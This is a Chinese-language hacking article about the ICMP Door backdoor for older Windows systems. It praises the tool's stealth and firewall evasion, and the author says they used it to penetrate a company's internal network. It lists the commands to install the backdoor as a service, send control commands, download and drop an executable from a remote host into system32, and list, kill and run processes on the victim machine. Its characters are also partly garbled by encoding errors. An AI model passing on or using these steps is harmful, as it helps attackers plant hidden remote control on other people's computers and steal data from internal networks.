C/S構(gòu)架通常被傳統(tǒng)的木馬后門程序所使用，C/S后門的構(gòu)架使得網(wǎng)絡(luò)黑客很容易對(duì)其控制，也一定程度使得后門私有化，避免了萬(wàn)能密碼的出現(xiàn)。但是關(guān)于C/S后門的概念比較模糊，其實(shí)很多的后門都可以歸結(jié)為C/S后門這一類，不過(guò)其中最巧妙的，也就是我們今天所舉例的ICMP Door。

ICMP Door

類型：系統(tǒng)后門

使用范圍：win2000/xp/2003

隱蔽程度：★★★★★

使用難度：★★★☆☆

危害程度：★★★★☆

查殺難度：★★★★★

這個(gè)后門利用ICMP通道進(jìn)行通信，所以不開(kāi)任何端口，只是利用系統(tǒng)本身的ICMP包進(jìn)行控制安裝成系統(tǒng)服務(wù)后，開(kāi)機(jī)自動(dòng)運(yùn)行，可以穿透很多防火墻——很明顯可以看出它的最大特點(diǎn)：不開(kāi)任何端口~只通過(guò)ICMP控制!和上面任何一款后門程序相比，它的控制方式是很特殊的，連80端口都不用開(kāi)放，不得不佩服務(wù)程序編制都在這方面獨(dú)特的思維角度和眼光!

運(yùn)用舉例

這個(gè)后門其實(shí)用途最廣的地方在于突破網(wǎng)關(guān)后對(duì)內(nèi)網(wǎng)計(jì)算機(jī)的控制，因?yàn)楹芏鄼C(jī)密數(shù)據(jù)都是放在內(nèi)網(wǎng)計(jì)算機(jī)上的，而控制內(nèi)網(wǎng)計(jì)算機(jī)并不是我們想到位的商業(yè)網(wǎng)絡(luò)進(jìn)行入侵檢測(cè)，它的網(wǎng)絡(luò)內(nèi)部并不像我們常見(jiàn)的內(nèi)網(wǎng)那樣非常容易入侵和控制，因?yàn)樵摴颈旧砩婕暗揭恍┚W(wǎng)絡(luò)安全的服務(wù)，所以內(nèi)網(wǎng)個(gè)人計(jì)算機(jī)的防護(hù)是很到位的，在嘗試過(guò)很多后門后，最后ICMP Door幫我實(shí)現(xiàn)了成功的滲透內(nèi)網(wǎng)!由此筆者開(kāi)始愛(ài)上這個(gè)后門。

首先使用icmpsrv.exe -install參數(shù)進(jìn)行后門的安裝，再使用icmpsend.exe IP進(jìn)行控制，可以用：[http://xxx.xxx.xxx/admin.exe -hkfx.exe]方式下載文件，保存在[url=file://\\system32\]\\system32\[/url]目錄下，文件名為hkfx.exe，程序名前的“-”不能省去，使用[pslist]還可以列出遠(yuǎn)程主機(jī)的進(jìn)程名稱和pid，再使用[pskill id]就可以殺進(jìn)程了，同樣，輸入普通cmd命令，則遠(yuǎn)程主機(jī)也就執(zhí)行了相關(guān)的命令。

這個(gè)后門是采用的c/s構(gòu)架，必須要使用icmpsend才能激活服務(wù)器，但是他也有自己的先天不足：后門依靠ICMP進(jìn)行通訊，現(xiàn)在的網(wǎng)絡(luò)，經(jīng)過(guò)沖擊波的洗禮后，很少有服務(wù)器還接受ICMP包了，很多都屏蔽掉了它，所以用它來(lái)控制服務(wù)器不是一個(gè)好辦法，這也是我為什么用它來(lái)控制內(nèi)網(wǎng)計(jì)算機(jī)的原因了——內(nèi)網(wǎng)很少有人屏蔽ICMP包吧?!
 

【編輯推薦】

1. 淺談后門的概念與分類
2. 經(jīng)典后門實(shí)例之網(wǎng)頁(yè)后門
3. 經(jīng)典后門實(shí)例之線程插入后門
4. 經(jīng)典后門實(shí)例之?dāng)U展后門
5. 用Mysql語(yǔ)句來(lái)生成后門木馬方案